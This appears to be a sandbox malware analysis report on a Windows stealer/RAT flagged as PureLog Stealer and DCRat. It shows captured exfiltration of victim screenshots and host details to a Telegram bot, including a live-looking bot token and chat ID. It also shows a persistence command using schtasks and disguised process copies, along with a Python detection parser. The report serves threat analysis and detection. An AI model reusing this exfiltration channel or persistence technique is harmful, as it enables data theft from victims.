2024-11-18 08:17:13 UTC | 4096 | OUT | Data Raw: 71 aa f8 7a e3 ec 6c b2 0b bb 46 f2 5b 38 0d b9 0e d3 fa 8a c4 f1 26 98 7c 41 67 b5 b4 5b d8 ee 90 7e ea 6d d0 71 ec 7f 79 c8 a7 e9 3a bc 7a 7f 86 f4 48 9e 7d 3a 32 74 e8 1b 17 37 9e 53 7d c1 d0 6d 3c 71 d7 eb 5a 36 5a e4 57 97 71 c0 b7 3a 53 97 cf cb 05 f8 91 ce 01 3c 2e d1 9f ce bc c7 4a a4 1f 34 7a 1d 5e d2 9c d7 24 ba 9e 2b 71 04 96 b7 32 db cc bb 65 89 ca 3a e7 38 20 e0 8e 2a 2c 56 96 bf ff 00 23 1e a9 ff 00 5f 72 ff 00 e8 66 b3 ab ec 70 f3 73 a3 09 4b 76 97 e4 7c 1e 2a 11 85 79 c2 3b 26 d7 e2 25 14 b4 95 a9 8d c2 92 96 8a 00 4a 28 34 50 31 28 a3 14 53 00 a3 14 51 40 c4 a2 8a 28 01 28 a5 34 94 00 94 52 d2 50 30 a4 a5 a4 a0 61 49 4b 49 40 05 21 a5 a4 34 0c 28 a2 8a 00 31 49 8a 5a 43 40 c4 a2 8c 51 8a 06 18 a4 a5 c5 18 a6 02 51 4b 46 28 b8 c6 91 47 6a
    Data Ascii: qzlF[8&|Ag[~mqy:zH}:2t7S}m<qZ6ZWq:S<.J4z^$+q2e:8 *,V#_rfpsKv|*y;&%J(4P1(SQ@((4RP0aIKI@!4(1IZC@QQKF(Gj
2024-11-18 08:17:14 UTC | 1605 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 18 Nov 2024 08:17:14 GMT
    Content-Type: application/json
    Content-Length: 1216
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":82,"from":{"id":7520842495,"is_bot":true,"first_name":"shapka52bot","username":"shapka52_bot"},"chat":{"id":1276083023,"first_name":"\u043f\u0430\u043c [ \u043f\u043e\u043c\u043e\u0433\u0438 ]","username":"SCOROUMRU","type":"private"},"date":1731917834,"photo":[{"file_id":"AgACAgIAAxkDAANSZzr4CteNLXKO7NSxLbD7YMGqtB0AAmrgMRtpBNlJaBsKWqMsxZ8BAAMCAANzAAM2BA","file_unique_id":"AQADauAxG2kE2Ul4","file_size":1271,"width":90,"height":72},{"file_id":"AgACAgIAAxkDAANSZzr4CteNLXKO7NSxLbD7YMGqtB0AAmrgMRtpBNlJaBsKWqMsxZ8BAAMCAANtAAM2BA","file_unique_id":"AQADauAxG2kE2Uly","file_size":16016,"width":320,"height":256},{"file_id":"AgACAgIAAxkDAANSZzr4CteNLXKO7NSxLbD7YMGqtB0AAmrgMRtpBNlJaBsKWqMsxZ8BAAMCAAN4AAM2BA","file_unique_id":"AQADauAxG2kE2Ul9","file_size":67046,"width":800,"height":640},{"file_id":"AgACAgIAAxkDAANSZzr4CteNLXKO7NSxLbD7YMGqtB0AAmrgMRtpBNlJaBsKWqMsxZ8BAAMCAAN5AAM2BA","file_unique_id":"AQADauAxG2kE2Ul-","file_size":99938,"width":1280,"height":1024}],"caption":"new user conn [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.6 | 49990 | 34.117.59.81 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:18:13 UTC | 61 | OUT | GET /ip HTTP/1.1
    Host: ipinfo.io
    Connection: Keep-Alive
2024-11-18 08:18:14 UTC | 305 | IN | HTTP/1.1 200 OK
    date: Mon, 18 Nov 2024 08:18:13 GMT
    content-type: text/plain; charset=utf-8
    Content-Length: 14
    access-control-allow-origin: *
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close
2024-11-18 08:18:14 UTC | 14 | IN | Data Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
    Data Ascii: 155.94.241.187


Session ID | Source IP | Source Port | Destination IP | Destination Port
4 | 192.168.2.6 | 49991 | 34.117.59.81 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:18:14 UTC | 42 | OUT | GET /country HTTP/1.1
    Host: ipinfo.io
2024-11-18 08:18:14 UTC | 448 | IN | HTTP/1.1 200 OK
    access-control-allow-origin: *
    Content-Length: 3
    content-type: text/html; charset=utf-8
    date: Mon, 18 Nov 2024 08:18:14 GMT
    referrer-policy: strict-origin-when-cross-origin
    x-content-type-options: nosniff
    x-frame-options: SAMEORIGIN
    x-xss-protection: 1; mode=block
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close
2024-11-18 08:18:14 UTC | 3 | IN | Data Raw: 55 53 0a
    Data Ascii: US


Session ID | Source IP | Source Port | Destination IP | Destination Port
5 | 192.168.2.6 | 49993 | 149.154.167.220 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:18:15 UTC | 256 | OUT | POST /bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhoto HTTP/1.1
    Content-Type: multipart/form-data; boundary="e2171771-5cfd-4b96-afc0-02258389f03e"
    Host: api.telegram.org
    Content-Length: 103439
    Expect: 100-continue
    Connection: Keep-Alive
2024-11-18 08:18:16 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-11-18 08:18:16 UTC | 40 | OUT | Data Raw: 2d 2d 65 32 31 37 31 37 37 31 2d 35 63 66 64 2d 34 62 39 36 2d 61 66 63 30 2d 30 32 32 35 38 33 38 39 66 30 33 65 0d 0a
    Data Ascii: --e2171771-5cfd-4b96-afc0-02258389f03e
2024-11-18 08:18:16 UTC | 89 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
    Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-11-18 08:18:16 UTC | 10 | OUT | Data Raw: 31 32 37 36 30 38 33 30 32 33
    Data Ascii: 1276083023
2024-11-18 08:18:16 UTC | 131 | OUT | Data Raw: 0d 0a 2d 2d 65 32 31 37 31 37 37 31 2d 35 63 66 64 2d 34 62 39 36 2d 61 66 63 30 2d 30 32 32 35 38 33 38 39 66 30 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
    Data Ascii: --e2171771-5cfd-4b96-afc0-02258389f03eContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
2024-11-18 08:18:16 UTC | 84 | OUT | Data Raw: 4c 6f 67 20 63 6f 6c 6c 65 63 74 65 64 0a 49 44 3a 20 66 65 33 63 34 62 38 33 30 35 35 30 35 36 31 34 38 61 36 37 39 34 62 39 61 37 34 63 63 66 36 61 31 36 31 39 30 32 30 38 0a 43 6f 6d 6d 65 6e 74 3a 20 0a 4c 6f 67 20 73 69 7a 65 3a 20 39 37 34 31 35
    Data Ascii: Log collectedID: fe3c4b83055056148a6794b9a74ccf6a16190208Comment: Log size: 97415
2024-11-18 08:18:16 UTC | 146 | OUT | Data Raw: 0d 0a 2d 2d 65 32 31 37 31 37 37 31 2d 35 63 66 64 2d 34 62 39 36 2d 61 66 63 30 2d 30 32 32 35 38 33 38 39 66 30 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
    Data Ascii: --e2171771-5cfd-4b96-afc0-02258389f03eContent-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
2024-11-18 08:18:16 UTC | 4096 | OUT | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
    Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
2024-11-18 08:18:16 UTC | 4096 | OUT | Data Raw: e2 e1 f0 db ef 20 f1 1f fc 93 2d 17 fd cb 6f fd 14 6b cf 6b d3 7c 73 6a 96 1e 0c b2 b3 88 b1 8e 09 62 89 4b 1e 48 54 60 33 ef c5 79 9d 56 52 d4 a9 4d af e6 7f 92 39 73 b4 e3 5a 09 ff 00 2a fc d8 94 50 68 af 50 f1 c2 92 96 92 80 3d 12 7b 3b 8b af 86 5a 6d c5 aa ef 9e c6 45 bb 54 fe f6 c6 6c fe 84 9f c2 b6 35 3b 1b 3f 1d f8 7a da e2 ce ec c5 22 b0 96 29 07 26 37 c7 2a c3 fc f6 35 73 c1 df f2 28 e9 df ee 37 fe 84 6a 9d d7 83 51 6f 64 bd d1 75 1b 8d 26 79 4e 64 58 46 e8 d8 fa 94 38 ff 00 0a f9 25 59 29 59 be 56 9b 69 fe 8c fb 9f 62 dc 13 4b 99 34 93 5f aa 23 d0 7c 2d 71 a5 ea 93 6b 5a c6 a9 f6 cb bf 2b 60 73 c2 a2 f7 24 9f 61 fc e9 9e 1d 94 eb 7e 2f d4 f5 e8 81 fb 12 44 2c ad dc 8f f5 98 20 b1 1e d9 1f ad 2b 78 3a f6 fc 84 d6 bc 45 77 7b 6c 0e 4c 11 c6 21 56
    Data Ascii: -okk|sjbKHT`3yVRM9sZ*PhP={;ZmETl5;?z")&7*5s(7jQodu&yNdXF8%Y)YVibK4_#|-qkZ+`s$a~/D, +x:Ew{lL!V
2024-11-18 08:18:16 UTC | 4096 | OUT | Data Raw: be 45 29 e4 f0 96 9c df d3 1c 33 e9 c7 5e 45 d3 f0 d8 cf b3 be b0 8a de de 29 35 24 5c 0b 75 72 6d 9c ed dc 3f 79 f5 d9 d3 fd ae d5 7a 19 04 d1 ef 52 0a e4 80 40 c6 47 ad 2f 93 11 ff 00 96 49 ff 00 7c 8a 78 00 0c 00 00 f6 af 4a 95 39 c1 fb d2 ba 3c 9a f5 a9 d4 5e ec 2c ca 9a a2 33 e9 b7 08 a3 24 af 15 5b 5a ba 9b 53 d5 75 0b ad 2a de da d6 d8 6a 42 f9 66 85 64 0f 74 e8 4e c6 7d ec 71 8c 9e 00 51 f3 1e 2b 50 80 46 0d 20 45 51 80 00 1e c2 b3 c4 60 e1 5e a4 67 3e 9f f0 3f c8 d7 0d 8f a9 86 a7 28 43 a9 4c 6a 9a 64 1a e5 d8 b7 32 9d 2e da dc 5c 69 e0 c4 f9 fb 62 bb ca a0 83 d0 06 99 d7 77 fb 22 b3 f4 cb 4b 49 ac 74 c5 bf bd 8a d6 ee c2 dd ad d9 2e a3 91 92 54 2e ee 19 4a 2b 7c d9 72 08 20 76 20 f5 c6 df 96 9f dc 5f ca 86 8d 1b ef 22 9f a8 ae 3a 79 44 29 bb c6
    Data Ascii: E)3^E)5$\urm?yzR@G/I|xJ9<^,3$[ZSu*jBfdtN}qQ+PF EQ`^g>?(CLjd2.\ibw"KIt.T.J+|r v _":yD)
2024-11-18 08:18:16 UTC | 4096 | OUT | Data Raw: 71 aa f8 7a e3 ec 6c b2 0b bb 46 f2 5b 38 0d b9 0e d3 fa 8a c4 f1 26 98 7c 41 67 b5 b4 5b d8 ee 90 7e ea 6d d0 71 ec 7f 79 c8 a7 e9 3a bc 7a 7f 86 f4 48 9e 7d 3a 32 74 e8 1b 17 37 9e 53 7d c1 d0 6d 3c 71 d7 eb 5a 36 5a e4 57 97 71 c0 b7 3a 53 97 cf cb 05 f8 91 ce 01 3c 2e d1 9f ce bc c7 4a a4 1f 34 7a 1d 5e d2 9c d7 24 ba 9e 2b 71 04 96 b7 32 db cc bb 65 89 ca 3a e7 38 20 e0 8e 2a 2c 56 96 bf ff 00 23 1e a9 ff 00 5f 72 ff 00 e8 66 b3 ab ec 70 f3 73 a3 09 4b 76 97 e4 7c 1e 2a 11 85 79 c2 3b 26 d7 e2 25 14 b4 95 a9 8d c2 92 96 8a 00 4a 28 34 50 31 28 a3 14 53 00 a3 14 51 40 c4 a2 8a 28 01 28 a5 34 94 00 94 52 d2 50 30 a4 a5 a4 a0 61 49 4b 49 40 05 21 a5 a4 34 0c 28 a2 8a 00 31 49 8a 5a 43 40 c4 a2 8c 51 8a 06 18 a4 a5 c5 18 a6 02 51 4b 46 28 b8 c6 91 47 6a
    Data Ascii: qzlF[8&|Ag[~mqy:zH}:2t7S}m<qZ6ZWq:S<.J4z^$+q2e:8 *,V#_rfpsKv|*y;&%J(4P1(SQ@((4RP0aIKI@!4(1IZC@QQKF(Gj
2024-11-18 08:18:17 UTC | 1491 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 18 Nov 2024 08:18:16 GMT
    Content-Type: application/json
    Content-Length: 1102
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":83,"from":{"id":7520842495,"is_bot":true,"first_name":"shapka52bot","username":"shapka52_bot"},"chat":{"id":1276083023,"first_name":"\u043f\u0430\u043c [ \u043f\u043e\u043c\u043e\u0433\u0438 ]","username":"SCOROUMRU","type":"private"},"date":1731917896,"photo":[{"file_id":"AgACAgIAAxkDAANTZzr4SBmxO1TWIZyz0bTl3kqm8cMAAm3gMRtpBNlJ1RHpNEG2h0sBAAMCAANzAAM2BA","file_unique_id":"AQADbeAxG2kE2Ul4","file_size":1286,"width":90,"height":72},{"file_id":"AgACAgIAAxkDAANTZzr4SBmxO1TWIZyz0bTl3kqm8cMAAm3gMRtpBNlJ1RHpNEG2h0sBAAMCAANtAAM2BA","file_unique_id":"AQADbeAxG2kE2Uly","file_size":16327,"width":320,"height":256},{"file_id":"AgACAgIAAxkDAANTZzr4SBmxO1TWIZyz0bTl3kqm8cMAAm3gMRtpBNlJ1RHpNEG2h0sBAAMCAAN4AAM2BA","file_unique_id":"AQADbeAxG2kE2Ul9","file_size":68308,"width":800,"height":640},{"file_id":"AgACAgIAAxkDAANTZzr4SBmxO1TWIZyz0bTl3kqm8cMAAm3gMRtpBNlJ1RHpNEG2h0sBAAMCAAN5AAM2BA","file_unique_id":"AQADbeAxG2kE2Ul-","file_size":102895,"width":1280,"height":1024}],"caption":"Log collecte [TRUNCATED]
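Detection logic for the two sendPhoto exchanges above (sessions 2 and 5), as an added example that is not part of the Joe Sandbox report and not code from the sample: a small Python parser that takes one captured HTTP request, pulls the bot token and API method out of the request path, walks the multipart body to recover chat_id, the caption fields (ID, Username, PC Name, IP, GEO, or "Log size" for the second upload) and the attachment, and checks the attachment's magic bytes. The request embedded in the block is constructed: it is rebuilt from the bytes the report shows for session 2, with the JPEG body cut down to its first bytes. Two things the raw dump shows that the parser makes explicit: the stealer names the upload screenshot.png but the bytes start ff d8 ff e0 / JFIF, so it is a JPEG and file-type rules must key on content rather than the filename; and the token in the path plus the chat_id (whose owner the server's response identifies as username SCOROUMRU) together describe the operator side of this channel.

```python
import json
import re

# Constructed sample, rebuilt from the bytes the report shows for session 2;
# the JPEG body is cut to its first bytes (the real upload was ~100 KB).
BOUNDARY = b"5911ef4b-6830-488b-9b69-d419e32ff926"
CAPTION = (b"new user connect !\nID: fe3c4b83055056148a6794b9a74ccf6a16190208\n"
           b"Comment: \nUsername: user\nPC Name: 609290\nIP: 155.94.241.187\nGEO: US\n")
JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00"

# Bot tokens are "<numeric bot id>:<35 chars of [A-Za-z0-9_-]>" and travel in the
# request path, so the path alone is a high-fidelity indicator.
TELEGRAM_TOKEN_RE = re.compile(rb"/bot(\d{8,12}:[A-Za-z0-9_-]{35})/([A-Za-z]+)")
MAGIC = [(b"\xff\xd8\xff", "jpeg"), (b"\x89PNG\r\n\x1a\n", "png"), (b"PK\x03\x04", "zip")]


def build_sample_request():
    """Constructed request in the same multipart layout the report shows."""
    def part(disposition, data, text=True):
        ctype = b"Content-Type: text/plain; charset=utf-8\r\n" if text else b""
        return ctype + b"Content-Disposition: form-data; " + disposition + b"\r\n\r\n" + data

    sep = b"\r\n--" + BOUNDARY + b"\r\n"
    body = b"--" + BOUNDARY + b"\r\n" + sep.join([
        part(b"name=chat_id", b"1276083023"),
        part(b"name=caption", CAPTION),
        part(b"name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png",
             JPEG_HEAD, text=False),
    ]) + b"\r\n--" + BOUNDARY + b"--\r\n"
    head = (b"POST /bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhoto HTTP/1.1\r\n"
            b'Content-Type: multipart/form-data; boundary="' + BOUNDARY + b'"\r\n'
            b"Host: api.telegram.org\r\nContent-Length: " + str(len(body)).encode() + b"\r\n\r\n")
    return head + body


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body, boundary):
    """Minimal multipart/form-data parser; returns one dict per part."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:   # [0] is the preamble
        if chunk.startswith(b"--"):                   # "--boundary--" ends the body
            break
        if not chunk.startswith(b"\r\n"):
            raise ValueError("malformed part after delimiter")
        hdr, sep, data = chunk[2:].partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part without header/body separator")
        if data.endswith(b"\r\n"):                    # that CRLF belongs to the next delimiter
            data = data[:-2]
        name = re.search(rb'\bname="?([^";\r\n]+)', hdr)
        fname = re.search(rb'\bfilename="?([^";\r\n]+)', hdr)
        parts.append({"name": name.group(1).decode() if name else None,
                      "filename": fname.group(1).decode() if fname else None,
                      "data": data})
    return parts


def parse_caption(text):
    """Turn the stealer's 'Key: value' caption lines into a dict."""
    info = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            info[key.strip()] = value.strip()
        elif line.strip():                            # first line is the event name
            info.setdefault("event", line.strip())
    return info


def sniff(data):
    return next((kind for sig, kind in MAGIC if data.startswith(sig)), "unknown")


def extract_iocs(raw):
    """Return operator-side and victim-side indicators, or None if not a bot call."""
    method, path, headers, body = parse_request(raw)
    token = TELEGRAM_TOKEN_RE.search(path)
    if headers.get(b"host") != b"api.telegram.org" or token is None:
        return None
    bmatch = re.search(rb'boundary="?([^";\s]+)', headers.get(b"content-type", b""))
    fields = {p["name"]: p for p in parse_multipart(body, bmatch.group(1))} if bmatch else {}
    caption = fields.get("caption", {}).get("data", b"").decode("utf-8", "replace")
    photo = fields.get("photo")
    magic = sniff(photo["data"]) if photo else None
    ext = photo["filename"].rsplit(".", 1)[-1].lower() if photo and photo["filename"] else None
    ext = {"jpg": "jpeg"}.get(ext, ext)
    return {
        "api_method": token.group(2).decode(),
        "bot_token": token.group(1).decode(),
        "bot_id": token.group(1).split(b":")[0].decode(),
        "chat_id": fields.get("chat_id", {}).get("data", b"").decode(),
        "victim": parse_caption(caption),
        "attachment_name": photo["filename"] if photo else None,
        "attachment_magic": magic,
        # named .png on the wire but the bytes are JPEG: match on content, not names
        "extension_mismatch": bool(photo) and ext != magic,
    }


if __name__ == "__main__":
    print(json.dumps(extract_iocs(build_sample_request()), indent=2))
```

The token pattern is the piece worth lifting into a proxy or IDS rule: a path of the form /bot<id>:<token>/<method> occurs only in Bot API calls. Keep in mind that the sandbox sees this request in the clear only because it intercepts TLS; on a network without TLS inspection the session to 149.154.167.220:443 is opaque, and the observables are the DNS lookup or SNI for api.telegram.org from a process with no business talking to Telegram, preceded each time by the ipinfo.io /ip and /country requests that populate the caption.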


Target ID: 0
Start time: 03:17:02
Start date: 18/11/2024
Path: C:\Users\user\Desktop\LzmJLVB41K.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\LzmJLVB41K.exe"
Imagebase: 0x9e0000
File size: 1'998'336 bytes
MD5 hash: 2D756772BC00E5778D794C107358DDF7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2160562752.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2376236746.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

                                                                                                                Target ID:4
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /f
                                                                                                                Imagebase:0x7ff6e98c0000
                                                                                                                File size:235'008 bytes
                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"
                                                                                                                Imagebase:0x7ff684050000
                                                                                                                File size:2'759'232 bytes
                                                                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6584.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP"
                                                                                                                Imagebase:0x7ff64e610000
                                                                                                                File size:52'744 bytes
                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:8
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                                                                                                                Imagebase:0xff0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:9
                                                                                                                Start time:03:17:06
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                                                                                                                Imagebase:0xdc0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:10
                                                                                                                Start time:03:17:07
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline"
                                                                                                                Imagebase:0x7ff684050000
                                                                                                                File size:2'759'232 bytes
                                                                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:11
                                                                                                                Start time:03:17:07
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:12
                                                                                                                Start time:03:17:07
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A18.tmp" "c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP"
                                                                                                                Imagebase:0x7ff64e610000
                                                                                                                File size:52'744 bytes
                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:22
                                                                                                                Start time:03:17:08
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Recovery\ctfmon.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Recovery\ctfmon.exe
                                                                                                                Imagebase:0x4c0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
